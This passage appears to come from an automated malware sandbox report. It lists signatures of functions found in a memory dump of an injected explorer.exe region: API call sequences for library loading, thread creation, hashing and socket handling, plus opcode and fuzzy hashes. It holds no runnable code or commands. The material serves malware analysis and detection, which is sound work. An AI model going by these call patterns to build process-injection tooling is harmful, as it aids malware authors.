                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: closesocketshutdown$CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 1073023652-0
                                                                            • Opcode ID: 235f50aebb46bc464f7ab05e66ccd8ccd191cfa8eb97216690ab7208fa9ce6f8
                                                                            • Instruction ID: dcb639a29c5f6309414e4ae5ccf54e3c3365d1bdf8004c92219e97eee209a3ad
                                                                            • Opcode Fuzzy Hash: 235f50aebb46bc464f7ab05e66ccd8ccd191cfa8eb97216690ab7208fa9ce6f8
                                                                            • Instruction Fuzzy Hash: 3B11593215AA80C6E7329F18E499BDAB370F79C759F240215D6C656A98CF7EC455CB00
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: closesocketshutdown$CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 1073023652-0
                                                                            • Opcode ID: cb8934eb4f7bc3a0db0905c1e506579420ed85087974290e892497e4c38a9e4d
                                                                            • Instruction ID: dcb639a29c5f6309414e4ae5ccf54e3c3365d1bdf8004c92219e97eee209a3ad
                                                                            • Opcode Fuzzy Hash: cb8934eb4f7bc3a0db0905c1e506579420ed85087974290e892497e4c38a9e4d
                                                                            • Instruction Fuzzy Hash: 3B11593215AA80C6E7329F18E499BDAB370F79C759F240215D6C656A98CF7EC455CB00
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: closesocketshutdown$CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 1073023652-0
                                                                            • Opcode ID: d07affa4af74ba9c6dc041e1d220e6f0941e94259047affa75eb072f7aa2d55e
                                                                            • Instruction ID: dcb639a29c5f6309414e4ae5ccf54e3c3365d1bdf8004c92219e97eee209a3ad
                                                                            • Opcode Fuzzy Hash: d07affa4af74ba9c6dc041e1d220e6f0941e94259047affa75eb072f7aa2d55e
                                                                            • Instruction Fuzzy Hash: 3B11593215AA80C6E7329F18E499BDAB370F79C759F240215D6C656A98CF7EC455CB00
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$CreateInformationVersion
                                                                            • String ID:
                                                                            • API String ID: 3563531100-0
                                                                            • Opcode ID: e4348b458ff4f1f976adb9bc2e523157a452458e613d1e976ec5d4266348eb62
                                                                            • Instruction ID: a67123531e039f44f193631b59e20b1da73c7fb264679a6f6d3cfec1a87873e5
                                                                            • Opcode Fuzzy Hash: e4348b458ff4f1f976adb9bc2e523157a452458e613d1e976ec5d4266348eb62
                                                                            • Instruction Fuzzy Hash: FDE0DF74215A9082FB955B14E859F993220F789741FD00128E90A02BA4DF3CC08EC704
                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32 ref: 00BF218F
                                                                            • GetVolumeInformationW.KERNEL32 ref: 00BF21E0
                                                                              • Part of subcall function 00BFDAD0: CryptAcquireContextW.ADVAPI32 ref: 00BFDB1E
                                                                              • Part of subcall function 00BFDAD0: CryptCreateHash.ADVAPI32 ref: 00BFDB47
                                                                              • Part of subcall function 00BFDAD0: WaitForSingleObject.KERNEL32 ref: 00BFDBB5
                                                                              • Part of subcall function 00BFDAD0: CryptReleaseContext.ADVAPI32 ref: 00BFDCA2
                                                                              • Part of subcall function 00BFDAD0: CryptDestroyHash.ADVAPI32 ref: 00BFDCB5
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Crypt$ContextHash$AcquireCreateDestroyDirectoryInformationObjectReleaseSingleSystemVolumeWait
                                                                            • String ID:
                                                                            • API String ID: 2609862481-0
                                                                            • Opcode ID: 13fdeda7c2e5c2250e802208b82858c93158c3d073d366ca9cf810559a951751
                                                                            • Instruction ID: 1aa98583b266780df051f7f020d524762eb92e576b8fddfaea845509849d8958
                                                                            • Opcode Fuzzy Hash: 13fdeda7c2e5c2250e802208b82858c93158c3d073d366ca9cf810559a951751
                                                                            • Instruction Fuzzy Hash: BD114C32228AC482E760DB64F8987AF73E1F784744F904126E789C7E98DB7EC548CB04
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ProcWindow
                                                                            • String ID:
                                                                            • API String ID: 181713994-0
                                                                            • Opcode ID: 02aa5fef786a4fb99182c43541bf79e51a5a4e61dda55fb9103a89aab660f712
                                                                            • Instruction ID: 51c32ffdb0ad0fe18974940499ab93432635ff75d4d1afe23ef82dd19e17e611
                                                                            • Opcode Fuzzy Hash: 02aa5fef786a4fb99182c43541bf79e51a5a4e61dda55fb9103a89aab660f712
                                                                            • Instruction Fuzzy Hash: 51015B7214C28DC7D624DB58E18423ABBE0F385384F1042A6F78647B19CB7DC8C98B46
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ProcWindow
                                                                            • String ID:
                                                                            • API String ID: 181713994-0
                                                                            • Opcode ID: f1e5726a2f09741b6e4c8e908db0c6a897dd3715062ec5dd15aeb9964fb7b25b
                                                                            • Instruction ID: d51560e44a518108002b321b6feec93c3f463f8b38552a2baf8efdb50fa34131
                                                                            • Opcode Fuzzy Hash: f1e5726a2f09741b6e4c8e908db0c6a897dd3715062ec5dd15aeb9964fb7b25b
                                                                            • Instruction Fuzzy Hash: A201293658C688CBD6209B58E47423AB7E0F3CA355F6002E6F7C543A1ACF7DC9998B41
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: da2af1d5358e45a80c7f840fe45fc6962c5d488a89f3c32c77541c1115099bd7
                                                                            • Instruction ID: 23710b3f1c543a53ee69adb7264903b90c1a11bd136026bdc7910f471b103390
                                                                            • Opcode Fuzzy Hash: da2af1d5358e45a80c7f840fe45fc6962c5d488a89f3c32c77541c1115099bd7
                                                                            • Instruction Fuzzy Hash: 4701313471478183F7109B26F865BA726E0F7A5348F6046B5D45ACA6A8FB7CC949D380
                                                                            APIs
                                                                            • GetProcAddressForCaller.KERNELBASE ref: 00BF998F
                                                                            • GetProcAddress.KERNEL32 ref: 00BF99EE
                                                                            • LoadLibraryExW.KERNEL32 ref: 00BF9A38
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressProc$CallerLibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 3311809864-0
                                                                            • Opcode ID: 1f33e0d227f083223617d2c48e540e55c391f4ebc574c8c2512f086ed87e3818
                                                                            • Instruction ID: d359f33577629467e1d40c09c648155f6f0493bbdb777d292a2e70dff7ec642c
                                                                            • Opcode Fuzzy Hash: 1f33e0d227f083223617d2c48e540e55c391f4ebc574c8c2512f086ed87e3818
                                                                            • Instruction Fuzzy Hash: 3E01A536718BC9C5DB30CB04E490BAAB3A0F7C6744F814515D68E43A68DB7DD559CF41
APIs
• GetProcAddressForCaller.KERNELBASE ref: 00BF8D4C
• GetProcAddress.KERNEL32 ref: 00BF8DAE
• LoadLibraryW.KERNEL32 ref: 00BF8DF8
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: AddressProc$CallerLibraryLoad
• String ID:
• API String ID: 3311809864-0
• Opcode ID: 29f24ca8af7b1ec7b39b311e50dcf5f0945885a2f14febe62e27be05c9337b80
• Instruction ID: a68995b6ef28b84eb3b4f93a0dd1c6a241a7d982347d5560fbd91bf50936508a
• Opcode Fuzzy Hash: 29f24ca8af7b1ec7b39b311e50dcf5f0945885a2f14febe62e27be05c9337b80
• Instruction Fuzzy Hash: B601C43A218BC9CADB70CB04E4C47AAB3A4F7DA744F800116D68E83B68DF39C509CB41
APIs
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 972676e2263dc913d8f0aceba4ed3926a994122b1158fd80d1085a60b805af4a
• Instruction ID: 991b311437c44733bd0b74da394ebd62b98a690d4056bf1e9bf2514c40a35685
• Opcode Fuzzy Hash: 972676e2263dc913d8f0aceba4ed3926a994122b1158fd80d1085a60b805af4a
• Instruction Fuzzy Hash: E8F06530A48B4582FBA0EF15F828BEA23E1F348344F8047A6E649472A0CF7CC18CC705
APIs
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 97899df86d47d9c0d290823c76a79fd567d6de1076d23b08f7a01fa9945c199d
• Instruction ID: 6421d9e3d0e88371d6511fcc289be3dc399c08193801ee142204eaf3b5b099c9
• Opcode Fuzzy Hash: 97899df86d47d9c0d290823c76a79fd567d6de1076d23b08f7a01fa9945c199d
• Instruction Fuzzy Hash: BFF01A31E09A81C6F7709B61F86879523E1F36436CFA05665D6864A660CFBCC588D644
APIs
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 7bf3fda03488cde0f2424b2de49cc3ea02773bfd36645c5761c3d60d64d8c9f6
• Instruction ID: ab3226cc461d0f74f9614d4710a0c44ea72c47d1b7f7e885cc769d39dfad24bc
• Opcode Fuzzy Hash: 7bf3fda03488cde0f2424b2de49cc3ea02773bfd36645c5761c3d60d64d8c9f6
• Instruction Fuzzy Hash: 82E04631604B4892F730DB20FD18B923BA0F389358F904625CA4D52671CFBCC2EDC600
APIs
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 46766f59590c43c0cb273360e60c28dcd038db0768a1794d386c2c23107aae88
• Instruction ID: c1f29c0aac6beda0849fe06be852842039c9706aa404a5506b803bbaf64a81d4
• Opcode Fuzzy Hash: 46766f59590c43c0cb273360e60c28dcd038db0768a1794d386c2c23107aae88
• Instruction Fuzzy Hash: FED017B2619680C7F6788B01E050BAB7360F7C0700F401010E39642994CF3CCA84CE00
APIs
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 48b5383b38cba486ddfa990dbca9aa2bd6a836a40005c426cf510de7b801e9cc
• Instruction ID: c1f29c0aac6beda0849fe06be852842039c9706aa404a5506b803bbaf64a81d4
• Opcode Fuzzy Hash: 48b5383b38cba486ddfa990dbca9aa2bd6a836a40005c426cf510de7b801e9cc
• Instruction Fuzzy Hash: FED017B2619680C7F6788B01E050BAB7360F7C0700F401010E39642994CF3CCA84CE00
APIs
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 3a1423a10d6c23ad0d70ca8df7085a05a4326c9adc261c3d6554e918dcf8160a
• Instruction ID: c1f29c0aac6beda0849fe06be852842039c9706aa404a5506b803bbaf64a81d4
• Opcode Fuzzy Hash: 3a1423a10d6c23ad0d70ca8df7085a05a4326c9adc261c3d6554e918dcf8160a
• Instruction Fuzzy Hash: FED017B2619680C7F6788B01E050BAB7360F7C0700F401010E39642994CF3CCA84CE00
APIs
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 5cd527b682022ef2e181432df0d08e7952cbdf5ffb770021f4e618f9a49ae03e
• Instruction ID: c1f29c0aac6beda0849fe06be852842039c9706aa404a5506b803bbaf64a81d4
• Opcode Fuzzy Hash: 5cd527b682022ef2e181432df0d08e7952cbdf5ffb770021f4e618f9a49ae03e
• Instruction Fuzzy Hash: FED017B2619680C7F6788B01E050BAB7360F7C0700F401010E39642994CF3CCA84CE00
APIs
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
